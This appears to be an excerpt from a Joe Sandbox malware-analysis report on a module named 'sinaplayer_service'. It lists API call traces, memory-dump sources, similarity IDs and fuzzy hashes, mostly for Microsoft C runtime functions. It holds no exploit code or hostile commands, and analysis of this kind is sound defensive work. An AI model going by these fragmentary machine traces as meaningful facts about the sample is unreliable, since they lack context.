                                                                                                                                                                                                    • malloc.MSVCR120(?,00000000,00000000,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0A7B7F
                                                                                                                                                                                                      • Part of subcall function 6D08ED30: HeapAlloc.KERNEL32(005A0000,00000000,6D0FC0AD,00000000,?,00000000,?,6D09223C,6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000), ref: 6D08ED5D
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D206F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,0000FFFF,6D0D25E8,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E), ref: 6D0D207B
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(00000000,00000001,00000000,00000000,0000FFFF,6D0D25E8,?,00000000), ref: 6D0D2093
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrowVersion@$AddressAllocConcurrency@@HandleHeapManager@1@ModuleProcResourcemallocstd::exception::exception
                                                                                                                                                                                                    • String ID: GetLogicalProcessorInformationEx$]lm$kernel32.dll$%m
                                                                                                                                                                                                    • API String ID: 615551232-1272108725
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getdrive.MSVCR120 ref: 6D097C6F
                                                                                                                                                                                                      • Part of subcall function 6D094728: GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 6D094754
                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(0000002E,00000000,?,0000002E), ref: 6D097CB6
                                                                                                                                                                                                    • __validdrive.LIBCMT ref: 6D0D46AD
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D0D46BB
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D46C6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D46D1
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D46DD
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D46E8
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$CurrentDirectoryFullNamePath__doserrno__validdrive_getdrive
                                                                                                                                                                                                    • String ID: .$:.
                                                                                                                                                                                                    • API String ID: 1520938557-2811378331
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _dtest$Cbuild_cimag_creal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2231236516-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _crealf.LIBCMT(?,?), ref: 6D1428C2
                                                                                                                                                                                                    • _cimagf.LIBCMT(?,?,?,?), ref: 6D1428D0
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,?,?,?), ref: 6D1428DC
                                                                                                                                                                                                    • _fdtest.MSVCR120(?,?,?,?,?,?), ref: 6D1428E8
                                                                                                                                                                                                    • _logf.LIBCMT ref: 6D142B3B
                                                                                                                                                                                                    • __FCbuild.LIBCMT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6D142B56
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fdtest$Cbuild_cimagf_crealf_logf
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 791420253-0
                                                                                                                                                                                                    • Opcode ID: e50e70d10f62d2911f6ae43bcd8444ab39f3dec062d94944da299199b7d1ef9d
                                                                                                                                                                                                    • Instruction ID: 615d83ffec595730921baa097c009e467a8c49b4ae0602b7265b182f31e16114
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e50e70d10f62d2911f6ae43bcd8444ab39f3dec062d94944da299199b7d1ef9d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 148159B1D0901AEFCF156B90DA486EEBF74FF41714FA2C484D590B2098DBB04AB19F59
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • atol.MSVCR120(6D0B0A2E,6D0B0A2E,00000010,00000000,6D0B028F,00000000), ref: 6D0DD17F
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6D0DD248
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::atol
                                                                                                                                                                                                    • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                                                                                                                                    • API String ID: 2130343216-3945972591
                                                                                                                                                                                                    • Opcode ID: 3fd630ee924d77a164ee8859031ded7edb4a6431da404497c3267d7e5d025ab5
                                                                                                                                                                                                    • Instruction ID: f6329dd5c21539671e1e3a3b18ef8b1638e5ab63ea7423d35a7842eb3d9846c2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fd630ee924d77a164ee8859031ded7edb4a6431da404497c3267d7e5d025ab5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C571A17195C309AEFB60CBB8CD94FFE77B8AF46304F51406AE20593181DF749A448B61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D0A3EB4
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(000000A4,00000000,00000000,00000002,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0A3ED8
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0A3EDB
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0A3EE2
                                                                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0A3EE5
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0A3EF3
                                                                                                                                                                                                      • Part of subcall function 6D0A3E7E: __EH_prolog3.LIBCMT ref: 6D0A3E85
                                                                                                                                                                                                    • ___crtSetThreadpoolWait.LIBCMT ref: 6D0A3F37
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1E48
                                                                                                                                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,?,6D0ECB49,00000000,000000FF,0000000C), ref: 6D0D1E97
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1EA1
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1EB8
                                                                                                                                                                                                      • Part of subcall function 6D0A3A83: GetModuleHandleA.KERNEL32(00000000,7622F550), ref: 6D0A3A99
                                                                                                                                                                                                      • Part of subcall function 6D0A3A83: GetModuleFileNameW.KERNEL32(6D080000,?,00000104), ref: 6D0A3AB6
                                                                                                                                                                                                      • Part of subcall function 6D0A3A83: LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6D0A3ACF
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1EE4
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D15CF40,6D15CF40,?,?,00000000,?,?,?,?,6D0D312D,?), ref: 6D0D1EF3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Current$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorHandleLastModuleProcessThreadVersion@Wait$Concurrency@@DuplicateExceptionFileH_prolog3LibraryLoadManager@1@NameObjectRegisterResourceSingleThreadpoolThrow___crt
                                                                                                                                                                                                    • String ID: -1m
                                                                                                                                                                                                    • API String ID: 228956268-3491251440
                                                                                                                                                                                                    • Opcode ID: bdd6f8b16db48eff5fbb44a44055f756055d4d8f39b11b1c0785dbe5c553a2fe
                                                                                                                                                                                                    • Instruction ID: fad00173dae2fbc636f07e37f13938caf68b1064b028ba1d6495062e9c8234e9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdd6f8b16db48eff5fbb44a44055f756055d4d8f39b11b1c0785dbe5c553a2fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E331E371608352AFF700EBB59C48F7BBBECBB46654F04052AB698C6142DB74D804CBB2
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,?,00000180,00000000,6D0A6E91,00000004,6D0A6A4C,0000000C,6D0A3D89,0000000C,6D0A3E4B,?,00000000,?), ref: 6D0A6D29
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegisterTraceGuidsW), ref: 6D0A6D45
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,UnregisterTraceGuids), ref: 6D0A6D57
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,TraceEvent), ref: 6D0A6D6A
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceLoggerHandle), ref: 6D0A6D7D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableLevel), ref: 6D0A6D90
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetTraceEnableFlags), ref: 6D0A6DA3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D0948CA), ref: 6D0D379E
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(advapi32.dll,?,6D0948CA), ref: 6D0D37AE
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                    • String ID: GetTraceEnableFlags$GetTraceEnableLevel$GetTraceLoggerHandle$RegisterTraceGuidsW$TraceEvent$UnregisterTraceGuids$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2340687224-19120757
                                                                                                                                                                                                    • Opcode ID: 5a733482c004f6cc1c9403c2e8810dbbc8d367b497cca28d794ca968987060d9
                                                                                                                                                                                                    • Instruction ID: 6f68cd230049f5c04b04663c4886138a1be7f5a5084eb00bdde26233dfd02e69
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a733482c004f6cc1c9403c2e8810dbbc8d367b497cca28d794ca968987060d9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E3115431A10590AFEB189FA9D995B3A7BB8FB86601748442FE40687386DBB1D800CBD0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtCreateEventExW.MSVCR120(00000000,00000000,00000000,001F0002), ref: 6D0A3C1B
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D201B
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2031
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D203F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorExceptionLastThrow$Version@$Concurrency@@CreateEventManager@1@Resource__crt
                                                                                                                                                                                                    • String ID: ]lm
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 6D0EFAC6
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000030), ref: 6D0EFAEA
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E754C,6D15CEE8,?,?,?,?,?,?), ref: 6D0EFAFF
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0EFB12
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000), ref: 6D0EFB23
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,?,?,?,?,?,?,?,?,00000000), ref: 6D0EFB62
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 6D0EFB89
                                                                                                                                                                                                    • SetProcessAffinityMask.KERNEL32(00000000), ref: 6D0EFB90
                                                                                                                                                                                                    • free.MSVCR120(?,00000000), ref: 6D0EFBA3
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000), ref: 6D0EFBA9
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000000), ref: 6D0EFBB2
                                                                                                                                                                                                    • free.MSVCR120(?,00000000), ref: 6D0EFBDB
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000), ref: 6D0EFBE1
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$??2@CurrentProcess$??0exception@std@@AffinityExceptionH_prolog3_MaskThreadThrowstd::exception::exception
                                                                                                                                                                                                    • String ID: dwAffinityMask
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000000,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B3FFF
                                                                                                                                                                                                    • free.MSVCR120(005C2D90,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4018
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(005C2D90,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B402B
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4049
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B405B
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B406C
                                                                                                                                                                                                    • free.MSVCR120(005C2A20,?,?,6D0B42D0,6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0B4077
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0B409B
                                                                                                                                                                                                    • EncodePointer.KERNEL32(005C2A20), ref: 6D0B40A2
                                                                                                                                                                                                    • free.MSVCR120(005C74F0), ref: 6D0B40E3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Pointer$DecodeEncodeFreeHeap
                                                                                                                                                                                                    • String ID: *\$y[
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,00000000,?,?,?,?,6D0A6C6A), ref: 6D0A6C94
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(combase.dll,RoInitialize,?,?,?,?,6D0A6C6A), ref: 6D0A6CAD
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0A6CB4
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(combase.dll,RoUninitialize,?,?,?,?,6D0A6C6A), ref: 6D0A6CD6
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0A6CDD
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6D0A6C6A), ref: 6D0D387A
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,6D0A6C6A), ref: 6D0D3886
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,6D0A6C6A), ref: 6D0D389C
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,?,?,?,?,?,6D0A6C6A), ref: 6D0D38AA
                                                                                                                                                                                                    • _errno.MSVCR120(?,6D15CF40,?,?,?,?,?,6D0A6C6A), ref: 6D0D38B0
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,6D15CF40,?,?,?,?,?,6D0A6C6A), ref: 6D0D38BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorHandleLastModuleProc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionLibraryLoadThrow_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 885641006-3997890769
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_ValidateWrite@@YAHPAXI@Z.MSVCR120(00000000,00000001,6D099BE0,0000000C,6D099C33,?,?,00000000,00000000,6D099C58,00000008,6D099A04,?,?,?,00000000), ref: 6D099CF8
                                                                                                                                                                                                    • ?_ValidateWrite@@YAHPAXI@Z.MSVCR120(?,00000001,6D099BE0,0000000C,6D099C33,?,?,00000000,00000000,6D099C58,00000008,6D099A04,?,?,?,00000000), ref: 6D099D06
                                                                                                                                                                                                    • __AdjustPointer.MSVCR120(00000000,00000008,6D099BE0,0000000C,6D099C33,?,?,00000000,00000000,6D099C58,00000008,6D099A04,?,?,?,00000000), ref: 6D099D1E
                                                                                                                                                                                                    • ?_inconsistency@@YAXXZ.MSVCR120(6D099BE0,0000000C,6D099C33,?,?,00000000,00000000,6D099C58,00000008,6D099A04,?,?,?,00000000,6D0DB112), ref: 6D099D35
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ValidateWrite@@$?_inconsistency@@AdjustPointer
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 105498407-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno$isleadbytembtowc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3580289129-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D094523
                                                                                                                                                                                                    • free.MSVCR120(?,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D0A98B4
                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 6D0A98BF
                                                                                                                                                                                                    • free.MSVCR120(?,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D0A98D2
                                                                                                                                                                                                    • ___free_lconv_num.LIBCMT ref: 6D0A98DD
                                                                                                                                                                                                    • free.MSVCR120(?,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D0A98E7
                                                                                                                                                                                                    • free.MSVCR120(?,?,6D0AE01F,00000000,?,?,6D094540,00000000,00000000,00000000,?,6D092CCC,0000006C,6D092CF0,0000000C), ref: 6D0A98F2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$___free_lconv_mon___free_lconv_num
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2838340673-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtFlsGetValue.MSVCR120(6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0919C6
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,000003BC,00000008,6D091A5F,?,00000001,?), ref: 6D0919D7
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,00000008,6D091A5F,?,00000001,?), ref: 6D0919EF
                                                                                                                                                                                                    • _initptd.MSVCR120(00000000,00000000,6D091A5F,?,00000001,?), ref: 6D091A00
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000D), ref: 6D091C41
                                                                                                                                                                                                      • Part of subcall function 6D091BFD: _lock.MSVCR120(0000000C), ref: 6D091C62
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6D091A07
                                                                                                                                                                                                    • __freeptd.LIBCMT ref: 6D091BE9
                                                                                                                                                                                                    • GetCommandLineW.KERNEL32(6D091A28,00000008,6D091A5F,?,00000001,?), ref: 6D0ACAA6
                                                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 6D0ACD71
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D091A5F,?,00000001,?), ref: 6D0D3B99
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CommandLineValue__crt_lock$CurrentThread__freeptd_calloc_crt_initptdfree
                                                                                                                                                                                                    • String ID: 0'Z
                                                                                                                                                                                                    • API String ID: 1616718619-2320578061
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __dexp_ldtest$Cbuild_cimag_creal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1450283889-0
